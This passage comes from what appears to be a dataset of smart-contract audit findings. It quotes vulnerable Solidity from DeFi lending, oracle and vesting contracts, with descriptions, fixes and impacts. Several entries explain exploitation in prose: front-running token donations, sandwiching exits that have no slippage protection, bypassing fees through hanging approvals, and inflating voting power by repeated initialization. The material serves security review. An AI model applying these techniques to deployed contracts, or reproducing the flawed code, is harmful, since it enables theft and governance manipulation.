side.\\n```\\n// Redirect net portion of minor's side to maker\\nif (fromPosition.long.gt(fromPosition.short)) {\\n fundingValues.fundingMaker = fundingValues.fundingShort.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingShort = fundingValues.fundingShort.sub(fundingValues.fundingMaker);\\n}\\nif (fromPosition.short.gt(fromPosition.long)) {\\n fundingValues.fundingMaker = fundingValues.fundingLong.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingLong = fundingValues.fundingLong.sub(fundingValues.fundingMaker);\\n}\\n```\\n\\nPoC\\nGiven:\\nlong/major: 1000\\nshort/minor: 1\\nmaker: 1\\nThen:\\nskew(): 999/1000\\nfundingMaker: 0.999 of the funding\\nfundingShort: 0.001 of the funding\\nWhile the maker only matches for `1` of the major part and contributes to half of the total short side, it takes the entire funding.чThe correct formula to calculate the amount of funding belonging to the maker side should be:\\n```\\nfundingMakerRatio = min(maker, major - minor) / min(major, minor + maker)\\nfundingMaker = fundingMakerRatio * fundingMinor\\n```\\nчч```\\n// Redirect net portion of minor's side to maker\\nif (fromPosition.long.gt(fromPosition.short)) {\\n fundingValues.fundingMaker = fundingValues.fundingShort.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingShort = fundingValues.fundingShort.sub(fundingValues.fundingMaker);\\n}\\nif (fromPosition.short.gt(fromPosition.long)) {\\n fundingValues.fundingMaker = fundingValues.fundingLong.mul(Fixed6Lib.from(fromPosition.skew().abs()));\\n fundingValues.fundingLong = fundingValues.fundingLong.sub(fundingValues.fundingMaker);\\n}\\n```\\n -CurveTricryptoOracle incorrectly assumes that WETH is always the last token in the pool which leads to bad LP pricingчhighчCurveTricryptoOracle.sol#L53-L63\\n```\\n if (tokens.length == 3) {\\n /// tokens[2] is WETH\\n uint256 ethPrice = base.getPrice(tokens[2]);\\n return\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n }\\n```\\n\\nWhen calculating LP prices, CurveTricryptoOracle#getPrice always assumes that WETH is the second token in the pool. This isn't the case which will cause the LP to be massively overvalued.\\nThere are 6 tricrypto pools currently deployed on mainnet. Half of these pools have an asset other than WETH as token[2]:\\n```\\n 0x4ebdf703948ddcea3b11f675b4d1fba9d2414a14 - CRV\\n 0x5426178799ee0a0181a89b4f57efddfab49941ec - INV\\n 0x2889302a794da87fbf1d6db415c1492194663d13 - wstETH\\n```\\nчThere is no need to assume that WETH is the last token. Simply pull the price for each asset and input it into lpPrice.чLP will be massively overvalued leading to overborrowing and protocol insolvencyч```\\n if (tokens.length == 3) {\\n /// tokens[2] is WETH\\n uint256 ethPrice = base.getPrice(tokens[2]);\\n return\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n }\\n```\\n -ConvexSpell/CurveSpell.openPositionFarm will revert in some casesчmediumчThe fix for this issue from this contest is as following:\\n```\\nFile: blueberry-core\\contracts\\spell\\CurveSpell.sol\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n //this 'if' check is the fix from the previous contest\\n110:-> if (tokens[i] == borrowToken) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n break;\\n }\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n```\\n\\nThe key to this issue is that `borrowBalance` may be smaller than `IERC20Upgradeable(borrowToken).balanceOf(address(this))`. For simplicity, assume that CurveSpell supports an lptoken which contains two tokens : A and B.\\nBob transferred 1wei of A and B to the CurveSpell contract. Alice opens a position by calling `BlueBerryBank#execute`, and the flow is as follows:\\nenter `CurveSpell#openPositionFarm`.\\ncall `_doLend` to deposit isolated collaterals.\\ncall `_doBorrow` to borrow 100e18 A token. borrowBalance = 100e18.\\n`A.approve(pool, 100e18)`.\\n`suppliedAmts[0] = A.balance(address(this)) = 100e18+1wei`, `suppliedAmts[1] = 0`.\\ncall `ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint)`, then revert because the approved amount is not enough.\\nTherefore, no one can successfully open a position.\\nOf course, bob can also transfer 1wei of `borrowToken` to contract by front-running `openPositionFarm` for a specific user or all users.чThe following fix is for CurveSpell, but please don't forget ConvexSpell.\\nTwo ways for fix it:\\n```\\n--- a/blueberry-core/contracts/spell/CurveSpell.sol\\n+++ b/blueberry-core/contracts/spell/CurveSpell.sol\\n@@ -108,9 +108,7 @@ contract CurveSpell is BasicSpell {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n@@ -119,9 +117,7 @@ contract CurveSpell is BasicSpell {\\n uint256[3] memory suppliedAmts;\\n for (uint256 i = 0; i < 3; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n@@ -130,9 +126,7 @@ contract CurveSpell is BasicSpell {\\n uint256[4] memory suppliedAmts;\\n for (uint256 i = 0; i < 4; i++) {\\n if (tokens[i] == borrowToken) {\\n- suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n- address(this)\\n- );\\n+ suppliedAmts[i] = borrowBalance;\\n break;\\n }\\n }\\n```\\n\\n```\\n--- a/blueberry-core/contracts/spell/CurveSpell.sol\\n+++ b/blueberry-core/contracts/spell/CurveSpell.sol\\n@@ -103,7 +103,8 @@ contract CurveSpell is BasicSpell {\\n\\n // 3. Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n- _ensureApprove(param.borrowToken, pool, borrowBalance);\\n+ require(borrowBalance <= IERC20Upgradeable(borrowToken).balanceOf(address(this)), \"impossible\");\\n+ _ensureApprove(param.borrowToken, pool, IERC20Upgradeable(borrowToken).balanceOf(address(this)));\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n```\\nч`ConvexSpell/CurveSpell.openPositionFarm` will revert due to this issue.ч```\\nFile: blueberry-core\\contracts\\spell\\CurveSpell.sol\\n // 2. Borrow specific amounts\\n uint256 borrowBalance = _doBorrow(\\n param.borrowToken,\\n param.borrowAmount\\n );\\n\\n // 3. Add liquidity on curve\\n address borrowToken = param.borrowToken;\\n _ensureApprove(param.borrowToken, pool, borrowBalance);\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i = 0; i < 2; i++) {\\n //this 'if' check is the fix from the previous contest\\n110:-> if (tokens[i] == borrowToken) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n break;\\n }\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n } else if (tokens.length == 3) {\\n```\\n -Mainnet oracles are incompatible with wstETH causing many popular yields strategies to be brokenчmediumчChainlinkAdapterOracle.sol#L111-L125\\n```\\n uint256 decimals = registry.decimals(token, USD);\\n (\\n uint80 roundID,\\n int256 answer,\\n ,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n ) = registry.latestRoundData(token, USD);\\n if (updatedAt < block.timestamp - maxDelayTime)\\n revert Errors.PRICE_OUTDATED(token_);\\n if (answer <= 0) revert Errors.PRICE_NEGATIVE(token_);\\n if (answeredInRound < roundID) revert Errors.PRICE_OUTDATED(token_);\\n\\n return\\n (answer.toUint256() * Constants.PRICE_PRECISION) / 10 ** decimals;\\n```\\n\\nChainlinkAdapterOracle only supports single asset price data. This makes it completely incompatible with wstETH because chainlink doesn't have a wstETH oracle on mainnet. Additionally Band protocol doesn't offer a wstETH oracle either. This only leaves Uniswap oracles which are highly dangerous given their low liquidity.чCreate a special bypass specifically for wstETH utilizing the stETH oracle and it's current exchange rate.чMainnet oracles are incompatible with wstETH causing many popular yields strategies to be brokenч```\\n uint256 decimals = registry.decimals(token, USD);\\n (\\n uint80 roundID,\\n int256 answer,\\n ,\\n uint256 updatedAt,\\n uint80 answeredInRound\\n ) = registry.latestRoundData(token, USD);\\n if (updatedAt < block.timestamp - maxDelayTime)\\n revert Errors.PRICE_OUTDATED(token_);\\n if (answer <= 0) revert Errors.PRICE_NEGATIVE(token_);\\n if (answeredInRound < roundID) revert Errors.PRICE_OUTDATED(token_);\\n\\n return\\n (answer.toUint256() * Constants.PRICE_PRECISION) / 10 ** decimals;\\n```\\n -AuraSpell#closePositionFarm exits pool with single token and without any slippage protectionчmediumчAuraSpell.sol#L221-L236\\n```\\n (\\n uint256[] memory minAmountsOut,\\n address[] memory tokens,\\n uint256 borrowTokenIndex\\n ) = _getExitPoolParams(param.borrowToken, lpToken);\\n\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n```\\n\\nWhen exiting a the balancer vault, closePositionFarm makes a subcall to _getExitPoolParams which is used to set minAmountsOut.\\nAuraSpell.sol#L358-L361\\n```\\n (address[] memory tokens, , ) = wAuraPools.getPoolTokens(lpToken);\\n\\n uint256 length = tokens.length;\\n uint256[] memory minAmountsOut = new uint256[](length);\\n```\\n\\nInside _getExitPoolParams we see that minAmountsOut are always an empty array. This means that the user has no slippage protection and can be sandwich attacked, suffering massive losses.чAllow user to specify min amount received from exitчExits can be sandwich attacked causing massive loss to the userч```\\n (\\n uint256[] memory minAmountsOut,\\n address[] memory tokens,\\n uint256 borrowTokenIndex\\n ) = _getExitPoolParams(param.borrowToken, lpToken);\\n\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n```\\n -AuraSpell#closePositionFarm will take reward fees on underlying tokens when borrow token is also a rewardчmediumчAuraSpell.sol#L227-L247\\n```\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n );\\n }\\n }\\n\\n /// 4. Swap each reward token for the debt token\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n address sellToken = rewardTokens[i];\\n if (sellToken == STASH_AURA) sellToken = AURA;\\n\\n _doCutRewardsFee(sellToken);\\n```\\n\\nWe can see above that closePositionFarm redeems the BLP before it takes the reward cut. This can cause serious issues. If there is any overlap between the reward tokens and the borrow token then _doCutRewardsFee will take a cut of the underlying liquidity. This causes loss to the user as too many fees are taken from them.чUse the same order as ConvexSpell and sell rewards BEFORE burning BLPчUser will lose funds due to incorrect feesч```\\n wAuraPools.getVault(lpToken).exitPool(\\n IBalancerPool(lpToken).getPoolId(),\\n address(this),\\n address(this),\\n IBalancerVault.ExitPoolRequest(\\n tokens,\\n minAmountsOut,\\n abi.encode(0, amountPosRemove, borrowTokenIndex),\\n false\\n )\\n );\\n }\\n }\\n\\n /// 4. Swap each reward token for the debt token\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n address sellToken = rewardTokens[i];\\n if (sellToken == STASH_AURA) sellToken = AURA;\\n\\n _doCutRewardsFee(sellToken);\\n```\\n -Adversary can abuse hanging approvals left by PSwapLib.swap to bypass reward feesчmediumчAuraSpell.sol#L247-L257\\n```\\n _doCutRewardsFee(sellToken);\\n if (\\n expectedRewards[i] != 0 &&\\n !PSwapLib.swap(\\n augustusSwapper,\\n tokenTransferProxy,\\n sellToken,\\n expectedRewards[i],\\n swapDatas[i]\\n )\\n ) revert Errors.SWAP_FAILED(sellToken);\\n```\\n\\nAuraSpell#closePositionFarm allows the user to specify any expectedRewards they wish. This allows the user to approve any amount, even if the amount is much larger than they would otherwise use. The can abuse these hanging approvals to swap tokens out of order and avoid paying reward fees.\\nExample: Assume there are two rewards, token A and token B. Over time a user's position accumulates 100 rewards for each token. Normally the user would have to pay fees on those rewards. However they can bypass it by first creating hanging approvals. The user would start by redeeming a very small amount of LP and setting expectedRewards to uint256.max. They wouldn't sell the small amount leaving a very large approval left for both tokens. Now the user withdraws the rest of their position. This time they specify the swap data to swap token B first. The user still has to pay fees on token A but now they have traded token B before any fees can be taken on it.чAfter the swap reset allowances to 0чUser can bypass reward feesч```\\n _doCutRewardsFee(sellToken);\\n if (\\n expectedRewards[i] != 0 &&\\n !PSwapLib.swap(\\n augustusSwapper,\\n tokenTransferProxy,\\n sellToken,\\n expectedRewards[i],\\n swapDatas[i]\\n )\\n ) revert Errors.SWAP_FAILED(sellToken);\\n```\\n -ConvexSpell is completely broken for any curve LP that utilizes native ETHчmediumчConvexSpell.sol#L120-L127\\n```\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i; i != 2; ++i) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n```\\n\\nConvexSpell#openPositionFarm attempts to call balanceOf on each component of the LP. Since native ETH uses the `0xeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee` this call will always revert. This breaks compatibility with EVERY curve pool that uses native ETH which make most of the highest volume pools on the platfrom.чI would recommend conversion between native ETH and wETH to prevent this issue.чConvexSpell is completely incompatible with a majority of Curve poolsч```\\n if (tokens.length == 2) {\\n uint256[2] memory suppliedAmts;\\n for (uint256 i; i != 2; ++i) {\\n suppliedAmts[i] = IERC20Upgradeable(tokens[i]).balanceOf(\\n address(this)\\n );\\n }\\n ICurvePool(pool).add_liquidity(suppliedAmts, minLPMint);\\n```\\n -WAuraPools doesn't correctly account for AuraStash causing all deposits to be permanently lostчmediumчWAuraPools.sol#L413-L418\\n```\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n```\\n\\nWhen burning the wrapped LP token, it attempts to transfer each token to msg.sender. The problem is that stash AURA cannot be transferred like an regular ERC20 token and any transfers will revert. Since this will be called on every attempted withdraw, all deposits will be permanently unrecoverable.чCheck if reward is stash AURA and send regular AURA instead similar to what is done in AuraSpell.чAll deposits will be permanently unrecoverableч```\\n uint256 rewardTokensLength = rewardTokens.length;\\n for (uint256 i; i != rewardTokensLength; ) {\\n IERC20Upgradeable(rewardTokens[i]).safeTransfer(\\n msg.sender,\\n rewards[i]\\n );\\n```\\n -AuraSpell `openPositionFarm` will revert when the tokens contains `lpToken`чmediumчIn AuraSpell, the `openPositionFarm` will call `joinPool` in Balancer's vault. But when analyzing the `JoinPoolRequest` struct, we see issue on `maxAmountsIn` and `amountsIn` which can be in different length, thus this will be reverted since in Balancer's vault, this two array should be in the same length.\\n```\\nFile: AuraSpell.sol\\n function openPositionFarm(\\n OpenPosParam calldata param,\\n uint256 minimumBPT\\n )\\n// rest of code\\n {\\n// rest of code\\n /// 3. Add liquidity to the Balancer pool and receive BPT in return.\\n {\\n// rest of code\\n if (poolAmountOut != 0) {\\n vault.joinPool(\\n wAuraPools.getBPTPoolId(lpToken),\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n );\\n }\\n }\\n// rest of code\\n }\\n// rest of code\\n function _getJoinPoolParamsAndApprove(\\n address vault,\\n address[] memory tokens,\\n uint256[] memory balances,\\n address lpToken\\n ) internal returns (uint256[] memory, uint256[] memory, uint256) {\\n// rest of code\\n uint256 length = tokens.length;\\n uint256[] memory maxAmountsIn = new uint256[](length);\\n uint256[] memory amountsIn = new uint256[](length);\\n bool isLPIncluded;\\n for (i; i != length; ) {\\n if (tokens[i] != lpToken) {\\n amountsIn[j] = IERC20(tokens[i]).balanceOf(address(this));\\n if (amountsIn[j] > 0) {\\n _ensureApprove(tokens[i], vault, amountsIn[j]);\\n }\\n ++j;\\n } else isLPIncluded = true;\\n maxAmountsIn[i] = IERC20(tokens[i]).balanceOf(address(this));\\n unchecked {\\n ++i;\\n }\\n }\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n// rest of code\\n return (maxAmountsIn, amountsIn, poolAmountOut);\\n }\\n```\\n\\nthese `maxAmountsIn` and `amountsIn` are coming from `_getJoinPoolParamsAndApprove`. And by seeing the function, we can see that there is possible issue when the `tokens[i] == lpToken`.\\nWhen `tokens[i] == lpToken`, the flag `isLPIncluded` will be true. And will enter this block,\\n```\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n```\\n\\nthis will decrease the `amountsIn` length. Thus, `amountsIn` and `maxAmountsIn` will be in different length.\\nIn Balancer's `JoinPoolRequest` struct, the `maxAmountsIn`, and `userData` second decoded bytes (amountsIn) should be the same array length, because it will be checked in Balancer.\\n```\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n```\\n\\nTherefore, in this situation, it will be reverted.чIssue AuraSpell `openPositionFarm` will revert when the tokens contains `lpToken`\\nRemove the assembly code where it will decrease the `amountsIn` length when `isLPIncluded` is true to make sure the array length are same.чUser can't open position on AuraSpell when `tokens` contains `lpToken`ч```\\nFile: AuraSpell.sol\\n function openPositionFarm(\\n OpenPosParam calldata param,\\n uint256 minimumBPT\\n )\\n// rest of code\\n {\\n// rest of code\\n /// 3. Add liquidity to the Balancer pool and receive BPT in return.\\n {\\n// rest of code\\n if (poolAmountOut != 0) {\\n vault.joinPool(\\n wAuraPools.getBPTPoolId(lpToken),\\n address(this),\\n address(this),\\n IBalancerVault.JoinPoolRequest({\\n assets: tokens,\\n maxAmountsIn: maxAmountsIn,\\n userData: abi.encode(1, amountsIn, _minimumBPT),\\n fromInternalBalance: false\\n })\\n );\\n }\\n }\\n// rest of code\\n }\\n// rest of code\\n function _getJoinPoolParamsAndApprove(\\n address vault,\\n address[] memory tokens,\\n uint256[] memory balances,\\n address lpToken\\n ) internal returns (uint256[] memory, uint256[] memory, uint256) {\\n// rest of code\\n uint256 length = tokens.length;\\n uint256[] memory maxAmountsIn = new uint256[](length);\\n uint256[] memory amountsIn = new uint256[](length);\\n bool isLPIncluded;\\n for (i; i != length; ) {\\n if (tokens[i] != lpToken) {\\n amountsIn[j] = IERC20(tokens[i]).balanceOf(address(this));\\n if (amountsIn[j] > 0) {\\n _ensureApprove(tokens[i], vault, amountsIn[j]);\\n }\\n ++j;\\n } else isLPIncluded = true;\\n maxAmountsIn[i] = IERC20(tokens[i]).balanceOf(address(this));\\n unchecked {\\n ++i;\\n }\\n }\\n if (isLPIncluded) {\\n assembly {\\n mstore(amountsIn, sub(mload(amountsIn), 1))\\n }\\n }\\n// rest of code\\n return (maxAmountsIn, amountsIn, poolAmountOut);\\n }\\n```\\n -\"Votes\" balance can be increased indefinitely in multiple contractsчhighчThe \"voting power\" can be easily manipulated in the following contracts:\\n`ContinuousVestingMerkle`\\n`PriceTierVestingMerkle`\\n`PriceTierVestingSale_2_0`\\n`TrancheVestingMerkle`\\n`CrosschainMerkleDistributor`\\n`CrosschainContinuousVestingMerkle`\\n`CrosschainTrancheVestingMerkle`\\nAll the contracts inheriting from the contracts listed above\\nThis is caused by the public `initializeDistributionRecord()` function that can be recalled multiple times without any kind of access control:\\n```\\n function initializeDistributionRecord(\\n uint32 _domain, // the domain of the beneficiary\\n address _beneficiary, // the address that will receive tokens\\n uint256 _amount, // the total claimable by this beneficiary\\n bytes32[] calldata merkleProof\\n ) external validMerkleProof(_getLeaf(_beneficiary, _amount, _domain), merkleProof) {\\n _initializeDistributionRecord(_beneficiary, _amount);\\n }\\n```\\n\\nThe `AdvancedDistributor` abstract contract which inherits from the `ERC20Votes`, `ERC20Permit` and `ERC20` contracts, distributes tokens to beneficiaries with voting-while-vesting and administrative controls. Basically, before the tokens are vested/claimed by a certain group of users, these users can use these `ERC20` tokens to vote. These tokens are minted through the `_initializeDistributionRecord()` function:\\n```\\n function _initializeDistributionRecord(\\n address beneficiary,\\n uint256 totalAmount\\n ) internal virtual override {\\n super._initializeDistributionRecord(beneficiary, totalAmount);\\n\\n // add voting power through ERC20Votes extension\\n _mint(beneficiary, tokensToVotes(totalAmount));\\n }\\n```\\n\\nAs mentioned in the Tokensoft Discord channel these ERC20 tokens minted are used to track an address's unvested token balance, so that other projects can utilize 'voting while vesting'.\\nA user can simply call as many times as he wishes the `initializeDistributionRecord()` function with a valid merkle proof. With each call, the `totalAmount` of tokens will be minted. Then, the user simply can call `delegate()` and delegate those votes to himself, \"recording\" the inflated voting power.чOnly allow users to call once the `initializeDistributionRecord()` function. Consider using a mapping to store if the function was called previously or not. Keep also in mind that fully vested and claimed users should not be able to call this function and if they do, the total amount of tokens that should be minted should be 0 or proportional/related to the amount of tokens that they have already claimed.чThe issue totally breaks the 'voting while vesting' design. Any DAO/project using these contracts to determine their voting power could be easily manipulated/exploited.ч```\\n function initializeDistributionRecord(\\n uint32 _domain, // the domain of the beneficiary\\n address _beneficiary, // the address that will receive tokens\\n uint256 _amount, // the total claimable by this beneficiary\\n bytes32[] calldata merkleProof\\n ) external validMerkleProof(_getLeaf(_beneficiary, _amount, _domain), merkleProof) {\\n _initializeDistributionRecord(_beneficiary, _amount);\\n }\\n```\\n -`SafeERC20.safeApprove` reverts for changing existing approvalsчmediumч`SafeERC20.safeApprove` reverts when a non-zero approval is changed to a non-zero approval. The `CrosschainDistributor._setTotal` function tries to change an existing approval to a non-zero value which will revert.\\nThe safeApprove function has explicit warning:\\n```\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n```\\n\\nBut still the `_setTotal` use it to change approval amount:\\n```\\n function _allowConnext(uint256 amount) internal {\\n token.safeApprove(address(connext), amount);\\n }\\n\\n /** Reset Connext allowance when total is updated */\\n function _setTotal(uint256 _total) internal virtual override onlyOwner {\\n super._setTotal(_total);\\n _allowConnext(total - claimed);\\n }\\n```\\nчConsider using 'safeIncreaseAllowance' and 'safeDecreaseAllowance' instead of `safeApprove` in `_setTotal`.чDue to this bug all calls to `setTotal` function of `CrosschainContinuousVestingMerkle` and `CrosschainTrancheVestingMerkle` will get reverted.\\nTokensoft airdrop protocol is meant to be used by other protocols and the ability to change `total` parameter is an intended offering. This feature will be important for those external protocols due to the different nature & requirement of every airdrop. But this feature will not be usable by airdrop owners due to the incorrect code implementation.ч```\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n```\\n -CrosschainDistributor: Not paying relayer fee when calling xcall to claim tokens to other domainsчmediumчCrosschainDistributor is not paying relayer fee when calling xcall to claim tokens to other domains. The transaction will not be relayed on target chain to finnalize the claim. User will not receive the claimed tokens unless they bump the transaction fee themself.\\nIn `_settleClaim`, the CrosschainDistributor is using xcall to claim tokens to another domain. But relayer fee is not payed.\\n```\\n id = connext.xcall( // <------ relayer fee should be payed here\\n _recipientDomain, // destination domain\\n _recipient, // to\\n address(token), // asset\\n _recipient, // delegate, only required for self-execution + slippage\\n _amount, // amount\\n 0, // slippage -- assumes no pools on connext\\n bytes('') // calldata\\n );\\n```\\n\\nWithout the relayer fee, the transaction will not be relayed. The user will need to bump the relayer fee to finnally settle the claim by following the instructions here in the connext doc.чHelp user bump the transaction fee in Satellite.чUser will not receive their claimed tokens on target chain.ч```\\n id = connext.xcall( // <------ relayer fee should be payed here\\n _recipientDomain, // destination domain\\n _recipient, // to\\n address(token), // asset\\n _recipient, // delegate, only required for self-execution + slippage\\n _amount, // amount\\n 0, // slippage -- assumes no pools on connext\\n bytes('') // calldata\\n );\\n```\\n -Loss of funds during user adjustingчmediumчAdjusting a user's total claimable value not working correctly\\nWhenever the owner is adjusting user's total claimable value, the `records[beneficiary].total` is decreased or increased by `uint256 diff = uint256(amount > 0 ? amount : -amount);`.\\nHowever some assumptions made are not correct. Scenario:\\nUser has bought 200 FOO tokens for example.\\nIn `PriceTierVestingSale_2_0.sol` he calls the `initializeDistributionRecord` which sets his `records[beneficiary].total` to the purchased amount || 200. So `records[beneficiary].total` = 200\\nAfter that the owner decides to adjust his `records[beneficiary].total` to 300. So `records[beneficiary].total` = 300\\nUser decides to `claim` his claimable amount which should be equal to 300. He calls the `claim` function in `PriceTierVestingSale_2_0.sol`.\\n```\\nfunction claim(\\n address beneficiary // the address that will receive tokens\\n ) external validSaleParticipant(beneficiary) nonReentrant {\\n uint256 claimableAmount = getClaimableAmount(beneficiary);\\n uint256 purchasedAmount = getPurchasedAmount(beneficiary);\\n\\n // effects\\n uint256 claimedAmount = super._executeClaim(beneficiary, purchasedAmount);\\n\\n // interactions\\n super._settleClaim(beneficiary, claimedAmount);\\n }\\n```\\n\\nAs we can see here the `_executeClaim` is called with the `purchasedAmount` of the user which is still 200.\\n```\\nfunction _executeClaim(\\n address beneficiary,\\n uint256 _totalAmount\\n ) internal virtual returns (uint256) {\\n uint120 totalAmount = uint120(_totalAmount);\\n\\n // effects\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n _initializeDistributionRecord(beneficiary, totalAmount);\\n }\\n \\n uint120 claimableAmount = uint120(getClaimableAmount(beneficiary));\\n require(claimableAmount > 0, 'Distributor: no more tokens claimable right now');\\n\\n records[beneficiary].claimed += claimableAmount;\\n claimed += claimableAmount;\\n\\n return claimableAmount;\\n }\\n```\\n\\nNow check the `if` statement:\\n```\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n _initializeDistributionRecord(beneficiary, totalAmount);\\n }\\n```\\n\\nThe point of this is if the `total` of the user has been adjusted, to re-initialize to the corresponding amount, but since it's updated by the input value which is 200, records[beneficiary].total = 200 , the user will lose the 100 added from the owner during the `adjust`чI am not sure if it is enough to just set it the following way:\\n```\\n if (records[beneficiary].total != totalAmount) {\\n // re-initialize if the total has been updated\\n `--` _initializeDistributionRecord(beneficiary, totalAmount);\\n `++` _initializeDistributionRecord(beneficiary, records[beneficiary].total);\\n }\\n```\\n\\nThink of different scenarios if it is done that way and also keep in mind that the same holds for the decrease of `records[beneficiary].total` by `adjust`чLoss of funds for the user and the protocolч```\\nfunction claim(\\n address beneficiary // the address that will receive tokens\\n ) external validSaleParticipant(beneficiary) nonReentrant {\\n uint256 claimableAmount = getClaimableAmount(beneficiary);\\n uint256 purchasedAmount = getPurchasedAmount(beneficiary);\\n\\n // effects\\n uint256 claimedAmount = super._executeClaim(beneficiary, purchasedAmount);\\n\\n // interactions\\n super._settleClaim(beneficiary, claimedAmount);\\n }\\n```\\n -Exponential and logarithmic price adapters will return incorrect pricing when moving from higher dp token to lower dp tokenчmediumчThe exponential and logarithmic price adapters do not work correctly when used with token pricing of different decimal places. This is because the resolution of the underlying expWad and lnWad functions is not fit for tokens that aren't 18 dp.\\nAuctionRebalanceModuleV1.sol#L856-L858\\n```\\nfunction _calculateQuoteAssetQuantity(bool isSellAuction, uint256 _componentQuantity, uint256 _componentPrice) private pure returns (uint256) {\\n return isSellAuction ? _componentQuantity.preciseMulCeil(_componentPrice) : _componentQuantity.preciseMul(_componentPrice);\\n}\\n```\\n\\nThe price returned by the adapter is used directly to call _calculateQuoteAssetQuantity which uses preciseMul/preciseMulCeil to convert from component amount to quote amount. Assume we wish to sell 1 WETH for 2,000 USDT. WETH is 18dp while USDT is 6dp giving us the following price:\\n```\\n1e18 * price / 1e18 = 2000e6\\n```\\n\\nSolving for price gives:\\n```\\nprice = 2000e6\\n```\\n\\nThis establishes that the price must be scaled to:\\n```\\nprice dp = 18 - component dp + quote dp\\n```\\n\\nPlugging in our values we see that our scaling of 6 dp makes sense.\\nBoundedStepwiseExponentialPriceAdapter.sol#L67-L80\\n```\\n uint256 expExpression = uint256(FixedPointMathLib.expWad(expArgument));\\n\\n // Protect against priceChange overflow\\n if (scalingFactor > type(uint256).max / expExpression) {\\n return _getBoundaryPrice(isDecreasing, maxPrice, minPrice);\\n }\\n uint256 priceChange = scalingFactor * expExpression - WAD;\\n\\n if (isDecreasing) {\\n // Protect against price underflow\\n if (priceChange > initialPrice) {\\n return minPrice;\\n }\\n return FixedPointMathLib.max(initialPrice - priceChange , minPrice);\\n```\\n\\nGiven the pricing code and notably the simple scalingFactor it also means that priceChange must be in the same order of magnitude as the price which in this case is 6 dp. The issue is that on such small scales, both lnWad and expWad do not behave as expected and instead yield a linear behavior. This is problematic as the curve will produce 